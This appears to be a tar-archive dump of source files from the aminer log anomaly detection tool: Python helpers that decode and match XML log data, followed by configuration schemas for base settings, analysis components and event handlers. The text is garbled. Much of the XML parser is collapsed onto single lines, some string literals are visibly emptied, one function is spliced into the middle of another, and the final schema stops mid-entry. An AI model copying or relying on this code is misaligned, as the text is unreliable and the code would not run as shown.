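    that sees children wraps its result in {root_tag: [...]}, nested calls return a plain dict.
    @param attribute_prefix string prepended to attribute names so they can be told apart from child
    element tags. It is now passed down to the nested calls; previously every nested level fell back
    to the default "+" regardless of what the caller passed.
    @return for the root: {tag: [{first_child_tag: decoded_child}, ...]}; for a nested element with
    children: {prefix + attr: value, ..., child_tag: decoded_child, ...}; for a leaf: its text, which
    is None for an empty element. Attributes of leaf elements and of the root are not decoded.
    """
    children = [elem.tag for elem in xml_string]
    if obj is None and len(children) > 0:
        obj = {}
        # NOTE(review): every list entry is keyed by the FIRST child's tag (children[0]), not by the
        # tag of the child being decoded. Kept as-is; the XmlModelElement parser presumably expects
        # this shape — confirm before changing.
        obj[xml_string.tag] = [{children[0]: decode_xml(elem, obj, attribute_prefix)} for elem in xml_string]
        return obj
    if len(children) > 0:
        res = {}
        for key, value in xml_string.attrib.items():
            res[attribute_prefix + key] = value
        # Siblings with the same tag overwrite each other at this level; only the last one survives.
        for elem in xml_string:
            res[elem.tag] = decode_xml(elem, obj, attribute_prefix)
        return res
    return xml_string.text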
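def validate_key_parser_dict(self, dictionary: dict):
    """Validate the key_parser_dict recursively.

    Accepted values are ModelElementInterface instances, the literal "ALLOW_ALL", nested dicts
    (validated recursively) and non-empty lists whose entries are themselves acceptable values
    (nested lists included, since the matcher flattens them).
    @param dictionary the key_parser_dict or one of its nested dicts.
    @raises ValueError on an empty list.
    @raises TypeError on any other value type. List entries that are neither dicts nor
    ModelElementInterface instances nor "ALLOW_ALL" used to pass this check and only failed later
    while matching; they are now rejected when the element is constructed.
    """
    for value in dictionary.values():
        self._validate_key_parser_value(value)

def _validate_key_parser_value(self, value):
    """Validate one value of a key_parser_dict (see validate_key_parser_dict for the accepted forms)."""
    if isinstance(value, ModelElementInterface) or value == "ALLOW_ALL":
        return
    if isinstance(value, dict):
        self.validate_key_parser_dict(value)
        return
    if isinstance(value, list):
        if len(value) == 0:
            msg = "lists in key_parser_dict must have at least one entry."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise ValueError(msg)
        for entry in value:
            self._validate_key_parser_value(entry)
        return
    msg = "wrong type found in key_parser_dict."
    logging.getLogger(DEBUG_LOG_NAME).error(msg)
    raise TypeError(msg)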
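def get_full_key(self, key, dictionary):
    """Find the key of `dictionary` (one level of the key_parser_dict) that corresponds to a decoded XML key.

    Keys produced by decode_xml carry at most the attribute_prefix; the parser dict may additionally mark
    an attribute as optional (attribute_prefix + optional_attribute_prefix, or the reverse order) or an
    element as allowed-to-be-empty (empty_allowed_prefix).
    @param key the key as produced by decode_xml (tag name, or attribute_prefix + attribute name).
    @param dictionary the key_parser_dict level to look the key up in.
    @return the first prefixed variant present in dictionary, else key unchanged.
    """
    # Remove the attribute prefix once. The earlier str.lstrip(prefix) stripped every leading character
    # contained in the prefix string, which is wrong for multi-character prefixes.
    bare = key
    if bare.startswith(self.attribute_prefix):
        bare = bare[len(self.attribute_prefix):]
    candidates = (
        self.attribute_prefix + self.optional_attribute_prefix + bare,
        self.optional_attribute_prefix + self.attribute_prefix + bare,
        self.attribute_prefix + bare,
        self.empty_allowed_prefix + bare,
    )
    for candidate in candidates:
        if candidate in dictionary:
            return candidate
    return key

def get_stripped_key(self, key):
    """Reduce a key_parser_dict key to the form decode_xml produces.

    Removes a leading optional_attribute_prefix, turns attribute_prefix + optional_attribute_prefix into
    a plain attribute_prefix, and removes a leading empty_allowed_prefix, in that order. (The earlier
    docstring mentioned optional_key_prefix/nullable_key_prefix, which belong to the JSON model element.)
    @param key a key of the key_parser_dict.
    @return the key without its optional/empty-allowed markers.
    """
    opt = self.optional_attribute_prefix
    attr = self.attribute_prefix
    empty = self.empty_allowed_prefix
    if key.startswith(opt):
        key = key[len(opt):]
    if key.startswith(attr + opt):
        key = attr + key[len(attr + opt):]
    if key.startswith(empty):
        key = key[len(empty):]
    return key

def is_nullable_key(self, key):
    """Check whether a key_parser_dict key may have no value.

    True for keys starting with empty_allowed_prefix and for optional attributes, i.e. keys starting with
    attribute_prefix and optional_attribute_prefix in either order.
    @param key a key of the key_parser_dict.
    @return bool
    """
    opt = self.optional_attribute_prefix
    attr = self.attribute_prefix
    if key.startswith(self.empty_allowed_prefix):
        return True
    if key.startswith(opt) and key[len(opt):].startswith(attr):
        return True
    return key.startswith(attr) and key[len(attr):].startswith(opt)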
""" current_path = f"{path}/{self.element_id}" old_match_data = match_context.match_data matches: Union[List[Union[MatchElement, None]]] = [] try: index = 0 # There can be a valid case in which the text contains for example \x2d, \\x2d or \\\\x2d, which basically should be decoded # into the unicode form. while index != -1: index = match_context.match_data.find(rb"\x") if index != -1: try: match_context.match_data = match_context.match_data.decode("unicode-escape").encode() except UnicodeDecodeError: break index = 0 while index != -1: index = match_context.match_data.find(b"\\", index) if index != -1 and len(match_context.match_data) - 1 > index and match_context.match_data[ index + 1] not in b"\\'\"abfnrtv/": match_context.match_data = match_context.match_data[:index] + b"\\" + match_context.match_data[index:] index += 2 elif index != -1: index += 2 xml_string = match_context.match_data xml_match_data = decode_xml(xml.fromstring(xml_string)) if xml_string.startswith(b"", 1)[1] if not isinstance(xml_match_data, dict): return None except xml.ParseError as e: logging.getLogger(debug_log_prefix + DEBUG_LOG_NAME).debug(e) return None self.dec_escapes = True if self.is_escaped_unicode(match_context.match_data.decode()): match_context.match_data = match_context.match_data.decode("unicode-escape").encode() self.dec_escapes = False matches += self.parse_dict(self.key_parser_dict, xml_match_data, current_path, match_context) remove_chars = b' \r\n' match_data = match_context.match_data for c in remove_chars: match_data = match_data.replace(bytes(chr(c), encoding="utf-8"), b"") if None in matches or (match_data != b"" and len(matches) > 0): logging.getLogger(DEBUG_LOG_NAME).debug( debug_log_prefix + "get_match_element_main NONE RETURNED\n" + match_context.match_data.decode()) match_context.match_data = old_match_data return None # remove all remaining spaces and brackets. 
match_context.update(match_context.match_data) if len(matches) == 0: resulting_matches = None else: resulting_matches = matches return MatchElement(current_path, xml_string, xml_match_data, resulting_matches) # type: ignore[arg-type] def parse_dict(self, xml_dict: dict, xml_match_data: dict, current_path: str, match_context): """Parse a dictionary.""" matches: List[Union[MatchElement, None]] = [] if not self.check_keys(xml_dict, xml_match_data, match_context): return [None] for i, key in enumerate(xml_match_data.keys()): split_key = key key = self.get_full_key(key, xml_dict) if key not in xml_dict: index = match_context.match_data.find(key.encode()) match_context.update(match_context.match_data[:index]) logging.getLogger(DEBUG_LOG_NAME).debug(debug_log_prefix + "RETURN [NONE] 2" + key + str(xml_dict)) return [None] value = xml_dict[key] if isinstance(value, (dict, list)) and (not isinstance(xml_match_data, dict) or split_key not in xml_match_data): logging.getLogger(DEBUG_LOG_NAME).debug(debug_log_prefix + "RETURN [NONE] 3, Key: " + split_key + ", Value: " + repr(value)) return [None] if isinstance(value, dict): if xml_match_data[split_key] is None and self.is_nullable_key(key): data = b"null" matches.append(MatchElement(f"{current_path}/{key}", data, data, None)) index = match_context.match_data.find(data) if match_context.match_data[index + 4] == 34: # " index += 1 match_context.update(match_context.match_data[:index + len(data)]) return matches matches += self.parse_dict(value, xml_match_data[split_key], f"{current_path}/{split_key}", match_context) if xml_match_data[split_key] == {}: index = match_context.match_data.find(split_key.encode()) match_element = MatchElement( current_path+"/"+key, match_context.match_data[:index], match_context.match_data[:index], None) matches.append(match_element) match_context.update(match_context.match_data[:index]) if len(matches) == 0 or matches[-1] is None: logging.getLogger(DEBUG_LOG_NAME).debug(debug_log_prefix + "No match 
found for key " + split_key) return matches elif isinstance(value, list): res = self.parse_array(xml_dict, xml_match_data, key, split_key, current_path, matches, match_context, i) if res is not None: return res else: if key != split_key and split_key not in xml_match_data: logging.getLogger(DEBUG_LOG_NAME).debug(debug_log_prefix + f"Optional Key {key} not found in xml_match_data") continue if split_key not in xml_match_data: logging.getLogger(DEBUG_LOG_NAME).debug( debug_log_prefix + f"Key {split_key} not found in xml_match_data. RETURN [NONE] 4") return [None] if xml_dict[key] == "ALLOW_ALL": match_context.update(match_context.match_data[:match_context.match_data.find( f"".encode()) + len(f"")]) else: match_element, index, data = self.parse_object(xml_dict, xml_match_data, key, split_key, current_path, match_context) matches.append(match_element) if index == -1 and match_element is None: backslash = b"\\" logging.getLogger(DEBUG_LOG_NAME).debug( debug_log_prefix + f"Necessary element did not match! 
def check_keys(self, xml_dict, xml_match_data, match_context):
    """Verify that xml_match_data holds every mandatory key of xml_dict and that list values line up.

    @param xml_dict the (sub-)dictionary of the key_parser_dict being matched.
    @param xml_match_data the decoded XML data at the same level (a dict, or None for an empty element).
    @param match_context the MatchContext; on failure its data is cut at the first occurrence of the
    offending key so the caller can see where matching stopped.
    @return True when no mandatory key is missing and no list value meets a non-list parser spec,
    False otherwise (with a debug log line naming the key).
    """
    if xml_match_data is None:
        return False
    optional_prefixes = (self.optional_attribute_prefix, self.attribute_prefix + self.optional_attribute_prefix)

    def fail(key, reason):
        cut = match_context.match_data.find(key.encode())
        match_context.update(match_context.match_data[:cut])
        logging.getLogger(DEBUG_LOG_NAME).debug(debug_log_prefix + reason + key)
        return False

    for spec_key in xml_dict:
        if self.get_stripped_key(spec_key) in xml_match_data or spec_key.startswith(optional_prefixes):
            continue
        # A key carrying the empty_allowed_prefix is also accepted when present under its bare name.
        if spec_key.startswith(self.empty_allowed_prefix) and spec_key[len(self.empty_allowed_prefix):] in xml_match_data:
            continue
        return fail(spec_key, "RETURN [NONE] 1. Key: ")
    for spec_key in xml_dict.keys():
        stripped = self.get_stripped_key(spec_key)
        if not isinstance(xml_match_data, dict):
            return fail(spec_key, "RETURN [NONE] 5. Key: ")
        if stripped in xml_match_data and isinstance(xml_match_data[stripped], list) and not isinstance(xml_dict[spec_key], list):
            return fail(spec_key, "RETURN [NONE] 5. Key: ")
    return True
Data: " + data.decode()) index = -1 match_context.update(match_context.match_data[:index + len(data)]) if index == -1 and val == "ALLOW_ALL": logging.getLogger(DEBUG_LOG_NAME).debug( debug_log_prefix + "ALLOW_ALL (ARRAY-ELEMENT). Data: " + match_context.match_data.decode()) index = match_context.match_data.find(search_string) match_context.update(match_context.match_data[:index]) if match_element is not None or (match_element is None and not key.startswith(self.optional_key_prefix)): matches.append(match_element) if index == -1: if len(value) - 1 == k: return matches del matches[-1] continue if len(matches) == 0: return [None] if matches[-1] is None: if len(value) - 1 == k: logging.getLogger(DEBUG_LOG_NAME).debug(debug_log_prefix + "RETURN MATCHES 3") return matches del matches[-1] continue if len(xml_match_data.keys()) > i + 1: match_context.update(match_context.match_data[:match_context.match_data.find( list(xml_match_data.keys())[i + 1].encode())]) else: match_context.update(match_context.match_data[:match_context.match_data.find(search_string) + len(search_string)]) return None def parse_object(self, xml_dict, xml_match_data, key, split_key, current_path, match_context): """Parse a literal from the xml object.""" current_path += "/" + key data = xml_match_data[split_key] enc = "utf-8" if isinstance(data, str): if self.is_escaped_unicode(data) and self.dec_escapes: enc = "unicode-escape" data = data.encode(enc) elif isinstance(data, bool): data = str(data).replace("T", "t").replace("F", "f").encode() elif data is None: data = b"null" if self.is_nullable_key(key): start = 0 if "null" in key: start = match_context.match_data.find(data) + 4 index = match_context.match_data.find(data, start) if match_context.match_data[index + 4] == 34: index += 1 return MatchElement(current_path, data, data, None), index, data return None, -1, data elif not isinstance(data, bytes): data = str(data).encode() match_element = xml_dict[key].get_match_element(current_path, 
MatchContext(data)) if match_element is not None and len(match_element.match_string) != len(data) and ( not isinstance(match_element.match_object, bytes) or len(match_element.match_object) != len(data)): logging.getLogger(DEBUG_LOG_NAME).debug( debug_log_prefix + f"Data length not matching! match_string: {len(match_element.match_string)}, data: {len(data)}," f" data: {data.decode()}") match_element = None index = max([match_context.match_data.replace(b"\\", b"").find(split_key.encode()), match_context.match_data.find(split_key.encode()), match_context.match_data.decode().find(split_key)]) index += match_context.match_data[index:].find(split_key.encode()) + len(split_key.encode()) try: index += max([match_context.match_data.replace(b"\\", b"")[index:].find(data), match_context.match_data[index:].find(data), match_context.match_data.decode(enc)[index:].find(data.decode(enc))]) except UnicodeDecodeError: index += max([match_context.match_data.replace(b"\\", b"")[index:].find(data), match_context.match_data[index:].find(data), match_context.match_data.decode()[index:].find(data.decode())]) index += len(match_context.match_data[index:]) - len(match_context.match_data[index:].lstrip(b" \r\t\n")) if match_element is None: index = -1 return match_element, index, data logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/schemas/000077500000000000000000000000001500476301700306265ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/schemas/BaseSchema.py000066400000000000000000000125141500476301700331760ustar00rootroot00000000000000{ 'LearnMode': { 'required': False, 'type': 'boolean' }, 'AminerUser': { 'required': False, 'type': 'string', 'default': 'aminer', 'empty': False }, 'AminerGroup': { 'required': False, 'type': 'string', 'default': 'aminer', 'empty': False }, 'RemoteControlSocket': { 'required': False, 'type': 'string', 'empty': False }, 'Core.PersistenceDir': { 'required': False, 'type': 
'string', 'default': '/var/lib/aminer', 'empty': False }, 'Core.LogDir': { 'required': False, 'type': 'string', 'default': '/var/lib/aminer/log', 'empty': False }, 'Core.PersistencePeriod': { 'required': False, 'type': 'integer', 'default': 600, 'min': 1 }, 'MailAlerting.TargetAddress': { 'required': False, 'type': 'string', 'regex': '(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+.[a-zA-Z0-9-]+$)|^[a-zA-Z0-9]+@localhost$', 'default': 'root@localhost', 'empty': False }, 'MailAlerting.FromAddress': { 'required': False, 'type': 'string', 'regex': '(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+.[a-zA-Z0-9-]+$)|^[a-zA-Z0-9]+@localhost$', 'default': 'root@localhost', 'empty': False }, 'MailAlerting.SubjectPrefix': { 'required': False, 'type': 'string', 'default': 'aminer Alerts:' }, 'MailAlerting.AlertGraceTime': { 'required': False, 'type': 'integer', 'default': 0, 'min': 0 }, 'MailAlerting.EventCollectTime': { 'required': False, 'type': 'integer', 'default': 10, 'min': 0 }, 'MailAlerting.MinAlertGap': { 'required': False, 'type': 'integer', 'default': 600, 'min': 0 }, 'MailAlerting.MaxAlertGap': { 'required': False, 'type': 'integer', 'default': 600, 'min': 0 }, 'MailAlerting.MaxEventsPerMessage': { 'required': False, 'type': 'integer', 'default': 1000, 'min': 0 }, 'LogPrefix': { 'required': False, 'type': 'string', }, 'LogResourceList': { 'required': True, 'type': 'list', 'schema': {'type': ['string', 'dict'], 'regex': '^file://.+|^unix://.+', 'empty': False} }, 'Log.StatisticsPeriod': { 'required': False, 'type': 'integer', 'default': 3600, 'min': 0 }, 'Log.StatisticsLevel': { 'required': False, 'type': 'integer', 'default': 1, 'min': 0, 'max': 2 }, 'Log.DebugLevel': { 'required': False, 'type': 'integer', 'default': 1, 'min': 0, 'max': 2 }, 'Log.RemoteControlLogFile': { 'required': False, 'type': 'string', 'empty': False }, 'Log.StatisticsFile': { 'required': False, 'type': 'string', 'empty': False }, 'Log.DebugFile': { 'required': False, 'type': 'string', 'empty': False }, 
'Log.Rotation.MaxBytes': { 'required': False, 'type': 'integer', 'default': 104857600, # 100 Megabytes 'min': 1 }, 'Log.Rotation.BackupCount': { 'required': False, 'type': 'integer', 'default': 5, 'min': 1 }, 'Log.Encoding': { 'required': False, 'type': 'string', 'empty': False }, 'AminerId': { 'required': False, 'type': 'string', 'empty': False }, 'LogLineIdentifier': { 'required': False, 'type': 'boolean', 'default': False }, 'Input': { 'required': True, 'type': 'dict', 'schema': { 'multi_source': {'type': 'boolean', 'required': False, 'default': False}, 'timestamp_paths': {'type': ['string', 'list'], 'empty': False, 'required': True}, 'adjust_timestamps': {'type': 'boolean', 'required': False, 'default': False}, 'sync_wait_time': {'type': ['integer', 'float'], 'min': 1, 'default': 5}, 'eol_sep': {'type': 'string', 'required': False, 'default': '\n', 'empty': False}, 'json_format': {'type': 'boolean', 'required': False, 'default': False}, 'use_real_time': {'type': 'boolean', 'required': False, 'default': False}, 'xml_format': {'type': 'boolean', 'required': False, 'default': False}, 'continuous_timestamp_missing_warning': {'type': 'boolean', 'required': False, 'default': False} } } } logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/schemas/normalisation/000077500000000000000000000000001500476301700335055ustar00rootroot00000000000000AnalysisNormalisationSchema.py000066400000000000000000000411201500476301700414420ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/schemas/normalisation{ 'Analysis': { 'required': False, 'type': 'list', 'nullable': True, 'schema': { 'type': 'dict', 'schema': { 'id': {'type': 'string', 'nullable': True, 'default': None}, 'type': {'type': 'analysistype', 'coerce': 'toanalysistype', 'required': True}, 'paths': {'type': 'list', 'schema': {'type': 'string'}, 'nullable': True, 'default': None}, 'labels': {'type': 'list', 'schema': {'type': 'string'}, 
'nullable': True, 'default': None}, 'persistence_id': {'type': 'string', 'default': 'Default'}, 'output_logline': {'type': 'boolean', 'default': False}, 'learn_mode': {'type': 'boolean'}, 'num_windows': {'type': 'integer', 'required': True, 'default': 50}, 'min_anomaly_score': {'type': 'float', 'required': False, 'default': 1.1}, 'min_variance': {'type': 'float', 'required': False, 'default': 0.98}, 'allow_missing_values': {'type': 'boolean', 'default': False}, 'check_interval': {'type': 'integer', 'default': 3600}, 'realert_interval': {'type': 'integer', 'default': 36000}, 'report_interval': {'type': 'integer', 'default': 10}, 'reset_after_report_flag': {'type': 'boolean', 'default': False}, 'path': {'type': 'string', 'nullable': True, 'default': 'Default'}, 'parallel_check_count': {'type': 'integer', 'required': True, 'default': 10}, 'record_count_before_event': {'type': 'integer', 'default': 1000}, 'use_path_match': {'type': 'boolean', 'default': True}, 'use_value_match': {'type': 'boolean', 'default': True}, 'min_rule_attributes': {'type': 'integer', 'default': 1}, 'max_rule_attributes': {'type': 'integer', 'default': 5}, 'max_hypotheses': {'type': 'integer', 'default': 1000}, 'hypothesis_max_delta_time': {'type': 'float', 'default': 5.0}, 'generation_probability': {'type': 'float', 'default': 1.0}, 'generation_factor': {'type': 'float', 'default': 1.0}, 'max_observations': {'type': 'integer', 'default': 500}, 'p0': {'type': 'float', 'default': 0.9}, 'alpha': {'type': 'float', 'default': 0.05}, 'candidates_size': {'type': 'integer', 'default': 10}, 'hypotheses_eval_delta_time': {'type': 'float', 'default': 120.0}, 'delta_time_to_discard_hypothesis': {'type': 'float', 'default': 180.0}, 'check_rules_flag': {'type': 'boolean', 'default': True}, 'constraint_list': { 'type': 'list', 'schema': {'type': 'string'}, 'nullable': True, 'default': None}, 'ignore_list': { 'type': 'list', 'schema': {'type': 'string'}, 'nullable': True, 'default': None}, 'id_path_list': 
{'type': 'list', 'default': []}, 'scoring_path_list': { 'type': 'list', 'schema': {'type': 'string'}, 'nullable': True, 'default': None}, 'unique_path_list': { 'type': 'list', 'schema': {'type': 'string'}, 'nullable': True, 'default': None}, 'prob_thresh': {'type': 'float', 'default': 0.05}, 'default_freqs': {'type': 'boolean', 'default': False}, 'skip_repetitions': {'type': 'boolean', 'default': False}, 'seq_len': {'type': 'integer', 'default': 3}, 'timeout': {'type': ['integer', 'float'], 'nullable': True, 'default': None}, 'allow_missing_id': {'type': 'boolean', 'default': False}, 'window_size': {'type': ['integer', 'float'], 'default': 600}, 'confidence_factor': {'type': 'float', 'default': 0.33}, 'min_allowed_time_diff': {'type': 'float', 'default': 5.0}, 'lower_limit': {'type': ['integer', 'float']}, 'upper_limit': {'type': ['integer', 'float']}, 'idf': {'type': 'boolean', 'default': False}, 'norm': {'type': 'boolean', 'default': False}, 'add_normal': {'type': 'boolean', 'default': False}, 'check_empty_windows': {'type': 'boolean', 'default': False}, 'bin_size': {'type': 'integer'}, 'bin_count': {'type': 'integer'}, 'outlier_bins_flag': {'type': 'boolean', 'default': False}, 'modulo_value': {'type': 'integer'}, 'time_unit': {'type': 'integer'}, 'histogram_defs': {'type': 'list', 'schema': {'type': 'list', 'schema': {'type': 'string'}}}, 'bin_definition': {'type': 'string'}, 'tuple_transformation_function': {'type': 'string', 'allowed': ['demo'], 'nullable': True, 'default': None}, 'value_list': { 'type': 'list', 'schema': {'type': ['boolean', 'float', 'integer', 'string']}, 'nullable': True, 'default': None}, 'timestamp_path': {'type': 'string', 'nullable': True}, 'min_bin_elements': {'type': 'integer'}, 'min_bin_time': {'type': 'integer'}, 'debug_mode': {'type': 'boolean', 'default': False}, # TODO check which streams should be allowed 'stream': {'type': 'string', 'allowed': ['sys.stdout', 'sys.stderr']}, 'separator': {'type': 'string'}, 
'missing_value_string': {'type': 'string'}, 'subhandler_list': {'type': 'list', 'schema': {'type': 'string'}}, 'stop_when_handled_flag': {'type': 'boolean', 'default': False}, 'delete_components': {'type': 'boolean', 'default': True}, 'event_type': {'type': 'string'}, 'event_message': {'type': 'string'}, 'sub_rules': {'type': 'list', 'schema': {'type': 'string'}}, 'sub_rule': {'type': 'string'}, 'match_action': {'type': 'string', 'nullable': True, 'default': None}, 'rule_lookup_dict': {'type': 'dict'}, 'default_rule': {'type': 'string', 'nullable': True, 'default': None}, 'value': {'type': ['boolean', 'float', 'integer', 'string']}, 'regex': {'type': 'string'}, 'seconds_modulo': {'type': 'integer'}, 'limit_lookup_dict': {'type': 'dict', 'valuesrules': {'type': 'list', 'schema': { 'type': ['integer', 'float'], 'min': 0}}}, 'default_limit': {'type': 'list', 'schema': {'type': 'integer'}, 'nullable': True, 'default': None}, 'rule_id': {'type': 'string'}, 'min_time_delta': {'type': 'integer'}, 'max_time_delta': {'type': 'integer'}, 'artefact_match_parameters': {'type': 'list', 'schema': {'type': 'list', 'schema': {'type': 'string'}}, 'nullable': True, 'default': None}, 'max_violations': {'type': 'integer', 'default': 20}, 'action_id': {'type': 'string'}, 'artefact_a_rules': {'type': 'list', 'schema': {'type': 'string'}, 'nullable': True, 'default': None}, 'artefact_b_rules': {'type': 'list', 'schema': {'type': 'string'}, 'nullable': True, 'default': None}, 'ruleset': {'type': 'list', 'schema': {'type': 'string'}}, 'exit_on_error_flag': {'type': 'boolean', 'default': False}, 'allowlist_rules': {'type': 'list', 'schema': {'type': 'string'}}, 'parsed_atom_handler_lookup_list': { 'type': 'list', 'schema': {'type': 'list', 'schema': {'type': 'string', 'nullable': True}}}, 'default_parsed_atom_handler': {'type': 'string', 'nullable': True, 'default': None}, 'parsed_atom_handler_dict': {'type': 'dict', 'schema': {'id': {'type': 'string'}, 'type': {'type': 'string'}}}, 
'min_num_vals': {'type': 'integer', 'default': 1000}, 'max_num_vals': {'type': 'integer', 'default': 1500}, 'save_values': {'type': 'boolean', 'default': True}, 'waiting_time': {'type': 'integer', 'default': 300}, 'num_sections_waiting_time': {'type': 'integer', 'default': 10}, 'event_type_detector': {'type': 'string'}, 'used_gof_test': {'type': 'string', 'allowed': ['CM', 'KS'], 'default': 'CM'}, 'gof_alpha': {'type': 'float', 'default': 0.05}, 's_gof_alpha': {'type': 'float', 'default': 0.05}, 's_gof_bt_alpha': {'type': 'float', 'default': 0.05}, 'd_alpha': {'type': 'float', 'default': 0.1}, 'd_bt_alpha': {'type': 'float', 'default': 0.1}, 'range_alpha': {'type': 'float', 'default': 0.05}, 'dw_alpha': {'type': 'float', 'default': 0.05}, 'div_thres': {'type': 'float', 'default': 0.3}, 'sim_thres': {'type': 'float', 'default': 0.1}, 'indicator_thres': {'type': 'float', 'default': 0.4}, 'num_init': {'type': 'integer', 'default': 100}, 'num_update': {'type': 'integer', 'default': 50}, 'num_update_unq': {'type': 'integer', 'default': 200}, 'num_s_gof_values': {'type': 'integer', 'default': 50}, 'num_s_gof_bt': {'type': 'integer', 'default': 30}, 'num_d_bt': {'type': 'integer', 'default': 30}, 'num_pause_discrete': {'type': 'integer', 'default': 5}, 'num_pause_others': {'type': 'integer', 'default': 2}, 'test_gof_int': {'type': 'boolean', 'default': True}, 'num_stop_update': {'type': 'boolean', 'default': False}, 'silence_output_without_confidence': {'type': 'boolean', 'default': False}, 'silence_output_except_indicator': {'type': 'boolean', 'default': True}, 'num_var_type_hist_ref': {'type': 'integer', 'default': 10}, 'num_update_var_type_hist_ref': {'type': 'integer', 'default': 10}, 'num_var_type_considered_ind': {'type': 'integer', 'default': 10}, 'num_stat_stop_update': {'type': 'integer', 'default': 200}, 'num_updates_until_var_reduction': {'type': 'integer', 'default': 20}, 'var_reduction_thres': {'type': 'float', 'default': 0.6}, 'num_skipped_ind_for_weights': 
{'type': 'integer', 'default': 1}, 'num_ind_for_weights': {'type': 'integer', 'default': 100}, 'used_multinomial_test': {'type': 'string', 'allowed': ['Approx', 'MT', 'Chi'], 'default': 'Chi'}, 'use_empiric_distr': {'type': 'boolean', 'default': True}, 'save_statistics': {'type': 'boolean', 'default': True}, 'split_reports_flag': {'type': 'boolean', 'default': False}, 'disc_div_thres': {'type': 'float', 'default': 0.3}, 'num_steps_create_new_rules': {'type': 'integer', 'default': -1}, 'num_upd_until_validation': {'type': 'integer', 'default': 20}, 'num_end_learning_phase': {'type': 'integer', 'default': -1}, 'check_cor_thres': {'type': 'float', 'default': 0.5}, 'check_cor_prob_thres': {'type': 'float', 'default': 1.0}, 'check_cor_num_thres': {'type': 'integer', 'default': 10}, 'min_values_cors_thres': {'type': 'integer', 'default': 5}, 'new_vals_alarm_thres': {'type': 'float', 'default': 3.5}, 'num_bt': {'type': 'integer', 'default': 30}, 'alpha_bt': {'type': 'float', 'default': 0.1}, 'used_homogeneity_test': {'type': 'string', 'allowed': ['Chi', 'MaxDist'], 'default': 'Chi'}, 'used_range_test': {'type': 'string', 'allowed': ['MeanSD', 'EmpiricQuantiles', 'MinMax'], 'default': 'MinMax'}, 'range_threshold': {'type': 'float', 'default': 1}, 'range_limits_factor': {'type': 'float', 'default': 1}, 'num_reinit_range': {'type': 'integer', 'default': 100}, 'alpha_chisquare_test': {'type': 'float', 'default': 0.05}, 'max_dist_rule_distr': {'type': 'float', 'default': 0.1}, 'used_presel_meth': {'type': 'list', 'schema': {'type': 'string', 'allowed': [ 'matchDiscDistr', 'excludeDueDistr', 'matchDiscVals', 'random']}, 'nullable': True, 'default': None}, 'intersect_presel_meth': {'type': 'boolean', 'default': False}, 'percentage_random_cors': {'type': 'float', 'default': 0.20}, 'match_disc_vals_sim_tresh': {'type': 'float', 'default': 0.7}, 'exclude_due_distr_lower_limit': {'type': 'float', 'default': 0.4}, 'match_disc_distr_threshold': {'type': 'float', 'default': 0.5}, 
'used_cor_meth': {'type': 'list', 'schema': {'type': 'string', 'allowed': ['Rel', 'WRel']}, 'nullable': True, 'default': None}, 'used_validate_cor_meth': {'type': 'list', 'schema': {'type': 'string', 'allowed': [ 'coverVals', 'distinctDistr']}, 'nullable': True, 'default': None}, 'validate_cor_cover_vals_thres': {'type': 'float', 'default': 0.7}, 'validate_cor_distinct_thres': {'type': 'float', 'default': 0.05}, 'time_period_length': {'type': 'integer', 'min': 1, 'required': True, 'default': 86400}, 'max_time_diff': {'type': 'integer', 'min': 1, 'required': True, 'default': 360}, 'num_reduce_time_list': {'type': 'integer', 'min': 1, 'required': True, 'default': 10}, 'output_event_handlers': {'type': 'list', 'nullable': True, 'default': None}, 'suppress': {'type': 'boolean', 'default': False}, 'build_sum_over_values': {'type': 'boolean', 'default': False}, 'num_division_time_step': {'type': 'integer', 'default': 10}, 'num_min_time_history': {'type': 'integer', 'default': 20}, 'num_max_time_history': {'type': 'integer', 'default': 30}, 'num_results_bt': {'type': 'integer', 'default': 15}, 'round_time_interval_threshold': {'type': 'float', 'default': 0.02}, 'acf_threshold': {'type': 'float', 'default': 0.2}, 'acf_pause_interval_percentage': {'type': 'float', 'default': 0.2}, 'acf_auto_pause_interval': {'type': 'boolean', 'default': True}, 'acf_auto_pause_interval_num_min': {'type': 'integer', 'min': 1, 'required': True, 'default': 10}, 'num_log_lines_solidify_matrix': {'type': 'integer', 'default': 10000}, 'time_output_threshold': {'type': 'integer', 'default': 0}, 'anomaly_threshold': {'type': 'float', 'default': 0.05}, 'num_periods_tsa_ini': {'type': 'integer', 'default': 20}, 'allowed_id_tuples': {'type': 'list', 'schema': {'type': 'list', 'schema': {'type': 'string'}}, 'nullable': True, 'default': None}, 'force_period_length': {'type': 'boolean', 'default': False}, 'set_period_length': {'type': 'integer', 'default': 604800}, 'min_log_lines_per_time_step': {'type': 
'integer', 'default': 10}, 'empty_window_warnings': {'type': 'boolean', 'default': True}, 'early_exceeding_anomaly_output': {'type': 'boolean', 'default': False}, 'set_lower_limit': {'type': 'integer', 'min': 0, 'nullable': True, 'default': None}, 'set_upper_limit': {'type': 'integer', 'min': 0, 'nullable': True, 'default': None}, 'local_maximum_threshold': {'type': 'float', 'default': 0.2}, 'combine_values': {'type': 'boolean', 'nullable': True, 'default': True}, 'season': {'type': 'float', 'nullable': True, 'default': None}, 'stop_learning_time': {'type': ['integer', 'float'], 'nullable': True, 'default': None, 'min': 0.000001}, 'stop_learning_no_anomaly_time': {'type': ['integer', 'float'], 'nullable': True, 'default': None, 'min': 0.000001}, 'avg_factor': {'type': 'float', 'min': 0, 'default': 1}, 'var_factor': {'type': 'float', 'min': 0, 'default': 2}, 'log_resource_ignore_list': {'type': 'list', 'schema': {'type': 'string'}, 'nullable': True, 'default': None} } } } } EventHandlerNormalisationSchema.py000066400000000000000000000024301500476301700422370ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/schemas/normalisation{ 'EventHandlers': { 'required': False, 'type': 'list', 'nullable': True, 'default': None, 'schema': { 'type': 'dict', 'schema': { 'id': {'type': 'string', 'required': True}, 'type': {'type': 'eventhandlertype', 'coerce': 'toeventhandlertype', 'required': True}, 'json': {'type': 'boolean', 'default': False}, 'score': {'type': 'boolean', 'default': False}, 'instance_name': {'type': 'string', 'default': 'aminer'}, 'topic': {'type': 